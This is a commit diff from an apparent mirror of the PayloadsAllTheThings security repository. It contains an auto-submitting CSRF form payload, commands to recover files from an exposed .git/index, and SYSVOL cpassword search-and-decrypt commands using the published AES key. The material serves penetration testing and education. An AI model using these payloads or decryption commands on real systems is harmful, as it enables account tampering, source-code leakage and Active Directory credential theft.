daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

.git/index file parsing + fix CSRF payload typo

patch-1
Swissky 2019-02-07 23:33:47 +01:00
parent 8ff2aa8aff
commit 1c37517bf3
3 changed files with 25 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
CSRF injection/README.md
View File

@ -40,7 +40,7 @@ When you are logged in to a certain site, you typically have a session. The iden
### HTML POST (AutoSubmit No User Interaction) ### HTML POST (AutoSubmit No User Interaction)
```html ```html
<form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST"&> <form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
<input name="username" type="hidden" value="CSRFd" /> <input name="username" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" /> <input type="submit" value="Submit Request" />
</form> </form>

22
Insecure source code management/README.md
View File

@ -72,6 +72,28 @@ Check for the following files, if they exist you can extract the .git folder.
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
``` ```
### Recovering the content of .git/index
Use the git index file parser, using python3 https://pypi.python.org/pypi/gin
```powershell
pip3 install gin
gin ~/git-repo/.git/index
```
Recover name and sha1 hash for each files listed in the index, allowing us to re-use the previous method on the file.
```powershell
$ gin .git/index | egrep -e "name|sha1"
name = AWS Amazon Bucket S3/README.md
sha1 = 862a3e58d138d6809405aa062249487bee074b98
name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
### Automatic way : diggit.py ### Automatic way : diggit.py
```powershell ```powershell

4
Methodology and Resources/Active Directory Attack.md
View File

@ -129,13 +129,13 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
Find password in SYSVOL Find password in SYSVOL (MS14-025)
```powershell ```powershell
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
``` ```
Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)) Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx)
```bash ```bash
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000